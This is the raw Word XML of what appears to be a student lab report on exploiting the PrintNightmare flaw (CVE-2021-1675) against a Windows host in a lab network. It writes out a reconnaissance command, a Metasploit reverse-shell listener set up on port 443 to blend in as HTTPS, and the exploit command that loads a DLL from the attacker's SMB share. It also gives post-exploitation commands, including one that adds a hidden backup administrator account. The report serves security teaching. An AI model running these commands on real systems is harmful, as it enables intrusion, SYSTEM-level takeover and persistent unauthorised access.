            <wp:docPr id="8941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84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8872" cy="314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1F5F" w14:textId="0AE5F8A3" w:rsidR="007A5F2F" w:rsidRDefault="007A5F2F" w:rsidP="004C1EA5">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A5F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5F2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt; added this command here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1734D4B1" w14:textId="78E01409" w:rsidR="001669C5" w:rsidRPr="004C1EA5" w:rsidRDefault="001669C5" w:rsidP="004C1EA5">
      <w:r>
        <w:t>Based on the</w:t>
      </w:r>
      <w:r w:rsidR="006C4952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C4952">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4952">
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> results, we found host </w:t>
      </w:r>
      <w:r w:rsidRPr="004647A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.10.143</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D554DF">
        <w:t>have exposed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BDEA96" w14:textId="5687F3F1" w:rsidR="00D86139" w:rsidRPr="00D86139" w:rsidRDefault="005C61FC" w:rsidP="00D86139">
      <w:r>
        <w:t>We u</w:t>
      </w:r>
      <w:r w:rsidR="00657A01">
        <w:t>se</w:t>
      </w:r>
      <w:r w:rsidR="00AD129C">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00B3689F">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00B3689F" w:rsidRPr="00FF0C26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prcdump.py</w:t>
      </w:r>
      <w:r w:rsidR="00B3689F">
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B3689F">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B3689F">
        <w:t xml:space="preserve"> repository</w:t>
      </w:r>
      <w:r w:rsidR="00657A01">
        <w:t xml:space="preserve"> to confirm host vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00D86139">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D86139" w:rsidRPr="001F5416">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">rpcdump.py @172.16.10.143 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D86139" w:rsidRPr="001F5416">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>egrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D86139" w:rsidRPr="001F5416">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 'MS-RPRN|MS-PAR'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACDA58A" w14:textId="1AAEB389" w:rsidR="00B3689F" w:rsidRPr="00B3689F" w:rsidRDefault="00B3689F" w:rsidP="00B3689F">
      <w:r w:rsidRPr="00B3689F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="478CB2C5" wp14:editId="0A48C7D2">
            <wp:extent cx="3934691" cy="2675674"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="195499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1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8631" cy="267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A25" w14:textId="0032BF27" w:rsidR="00B40B20" w:rsidRPr="00B40B20" w:rsidRDefault="00B40B20" w:rsidP="00B40B20"/>
    <w:p w14:paraId="00C8DCE7" w14:textId="10D90955" w:rsidR="00764523" w:rsidRDefault="002B3AF9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc214502069"/>
      <w:r>
        <w:t>Attack</w:t>
      </w:r>
      <w:r w:rsidR="00764523">
        <w:t xml:space="preserve"> Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0A82AE49" w14:textId="70589C1B" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00093C4E">
        <w:t>From Kali Linux, o</w:t>
      </w:r>
      <w:r>
        <w:t>pen two Linux terminal</w:t>
      </w:r>
      <w:r w:rsidR="00CB5208">
        <w:t xml:space="preserve"> to do the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264CEE8" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run Metasploit console and create TCP listener for the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00627074" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>execute the payload/CVE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B80C145" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD3254">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Terminal 1:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MSFConsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to create the TCP listening server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75835792" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC36CA8" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRPr="002D0469" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0469">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="462C432C" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0469">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>use multi/handler</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – generic listener uses to manage payload callback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B19B62B" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRPr="00011986" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0469">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0469">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – use </w:t>
      </w:r>
      <w:r w:rsidRPr="00011986">
        <w:t>64-bit Windows reverse TCP shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E5888" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0469">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set LHOST 172.16.10.128</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Listener IP Address (Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684702C4" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0469">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set LPORT 443</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Listener Port (to conceal service identity under guise of https)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741FD3C" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D0469">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – activate the reverse TCP Handler</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CC0D90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="448589C2" wp14:editId="5202BB81">
            <wp:extent cx="4775200" cy="1641730"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1875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2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7334" cy="164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AD15" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3"/>
    <w:p w14:paraId="5AA8C0A4" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRPr="00DD3254" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3254">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Terminal 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F32E65" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Initiate the payload delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4791DE" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRPr="00C97CCA" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97CCA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Format: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B39576" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CCA">
        <w:t>./CVE-2021-1675.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  &lt;computer/domain&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CCA">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;username&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CCA">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;password&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CCA">
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;Victim IP&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CCA">
        <w:t>'\\</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Listerning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Server IP&gt;&lt;directory&gt;&lt;payload filename&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CCA">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC6C37B" w14:textId="77777777" w:rsidR="00971A02" w:rsidRPr="00C97CCA" w:rsidRDefault="00971A02" w:rsidP="00702FA3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6279C953" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRPr="00C97CCA" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D5FEC" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cd 3020lab/CVE-2021-1675</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5DAB7" w14:textId="77777777" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="00702FA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sudo python3 ./CVE-2021-1675.py user1:P@ssw0rd@172.16.10.143 ‘\\172.16.10.128\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rvshell.ll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687657DC" w14:textId="6ED8AB44" w:rsidR="00702FA3" w:rsidRDefault="00702FA3" w:rsidP="004276EB">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00103599">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE03082" wp14:editId="2CB1D39A">
            <wp:extent cx="4747129" cy="829733"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="17638865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6582" name="Picture 1" descr="A computer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1194" cy="8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D186F33" w14:textId="1272B194" w:rsidR="004276EB" w:rsidRDefault="004276EB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc214502070"/>
      <w:r>
        <w:t>Attack Result</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="391B4896" w14:textId="139FD4EE" w:rsidR="004276EB" w:rsidRDefault="004276EB" w:rsidP="004276EB">
      <w:r>
        <w:t>Successful payload delivery and reverse shell capture</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006065F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D6E947E" wp14:editId="319D119F">
            <wp:extent cx="5943600" cy="2650490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16758202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20246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5857" cy="265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BC713D" w14:textId="77777777" w:rsidR="004276EB" w:rsidRPr="006065F2" w:rsidRDefault="004276EB" w:rsidP="004276EB">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="006065F2">
        <w:t xml:space="preserve">On the victim system, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006065F2">
        <w:t>PrintNightmare’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006065F2">
        <w:t xml:space="preserve"> payload delivery does this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66512DB0" w14:textId="77777777" w:rsidR="004276EB" w:rsidRPr="00FA04AA" w:rsidRDefault="004276EB" w:rsidP="004276EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA04AA">
        <w:t>Victim Print Spooler accepts a remote driver-install request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5352B4CB" w14:textId="77777777" w:rsidR="004276EB" w:rsidRPr="00FA04AA" w:rsidRDefault="004276EB" w:rsidP="004276EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA04AA">
        <w:t>Victim downloads the DLL from the provided share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EEB341" w14:textId="77777777" w:rsidR="004276EB" w:rsidRPr="00FA04AA" w:rsidRDefault="004276EB" w:rsidP="004276EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA04AA">
        <w:t>Victim loads the DLL into spoolsv.exe (SYSTEM process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F807B" w14:textId="77777777" w:rsidR="004276EB" w:rsidRPr="00FA04AA" w:rsidRDefault="004276EB" w:rsidP="004276EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA04AA">
        <w:t>DLL code automatically executes with SYSTEM privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0CD8C" w14:textId="77777777" w:rsidR="004276EB" w:rsidRDefault="004276EB" w:rsidP="004276EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA04AA">
        <w:t>Payload behavior (reverse shell, etc.) runs invisibly in the background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6A844" w14:textId="77777777" w:rsidR="00AF5559" w:rsidRDefault="00AF5559" w:rsidP="00AF5559">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="650C99EC" w14:textId="77777777" w:rsidR="00AF5559" w:rsidRDefault="00AF5559" w:rsidP="00AF5559">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD0F0AC" w14:textId="77777777" w:rsidR="00F75502" w:rsidRDefault="00F75502" w:rsidP="00AF5559">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AD84BB" w14:textId="6B47E6A6" w:rsidR="00013AA5" w:rsidRDefault="00A95D3D" w:rsidP="00013AA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc214502071"/>
      <w:r>
        <w:t>Post Attack Exploitations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="17E041CD" w14:textId="77777777" w:rsidR="00EF5EC8" w:rsidRDefault="00EF5EC8" w:rsidP="00EF5EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Get hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11490BE9" w14:textId="77777777" w:rsidR="00EF5EC8" w:rsidRDefault="00EF5EC8" w:rsidP="00EF5EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Privilege permission verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5AAED7" w14:textId="77777777" w:rsidR="00EF5EC8" w:rsidRDefault="00EF5EC8" w:rsidP="00EF5EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create text file named hacked.txt containing message “ System is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hacked”in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Windows\System32\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-au directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F25159" w14:textId="77777777" w:rsidR="00EF5EC8" w:rsidRDefault="00EF5EC8" w:rsidP="00EF5EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add a new user with admin privileges as backup</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006A70DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B6C807D" wp14:editId="5C8A03B7">
            <wp:extent cx="4124335" cy="1380066"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="230994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4828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5741" cy="13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424C">
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C424C">
        <w:t>itadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C424C">
        <w:t xml:space="preserve"> cyb3r@3020 /add &amp;&amp; net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C424C">
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C424C">
        <w:t xml:space="preserve"> administrators </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C424C">
        <w:t>itadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001C424C">
        <w:t xml:space="preserve"> /add</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0016089C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35BD682F" wp14:editId="3E52B1B6">
            <wp:extent cx="3987800" cy="729393"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82384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772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7936" cy="7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A065" w14:textId="77777777" w:rsidR="00EF5EC8" w:rsidRPr="00FA04AA" w:rsidRDefault="00EF5EC8" w:rsidP="00EF5EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637670AF" w14:textId="205CD88E" w:rsidR="00D36CC4" w:rsidRDefault="00D36CC4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc214502072"/>
      <w:r>
        <w:t>Confirmation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0E7D9FE2" w14:textId="046B4F90" w:rsidR="00CC3945" w:rsidRDefault="00CC3945" w:rsidP="00CC3945">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D7EC1B" wp14:editId="2EC06792">
                <wp:extent cx="5943600" cy="1410346"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="99445678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410346"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6518063" cy="1513205"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="34244817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63333" y="0"/>
                            <a:ext cx="3554730" cy="1513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63477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255" cy="140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6B4DD5" id="Group 2" o:spid="_x0000_s1026" style="width:468pt;height:111.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="65180,15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">
                <v:shape id="Picture 1" o:spid="_x0000_s1027" type="#_x0000_t75" alt="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect." style="position:absolute;left:29633;width:35547;height:1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">
                  <v:imagedata r:id="rId36" o:title="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect"/>
                </v:shape>
                <v:shape id="Picture 1" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;width:28022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">
                  <v:imagedata r:id="rId37" o:title="" cropright="20988f"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514D5F6" w14:textId="35D0D60C" w:rsidR="001014A8" w:rsidRDefault="0071175E" w:rsidP="00CC3945">
      <w:r w:rsidRPr="0071175E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B050B8" wp14:editId="0F67E3B0">
            <wp:extent cx="3694176" cy="1464646"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
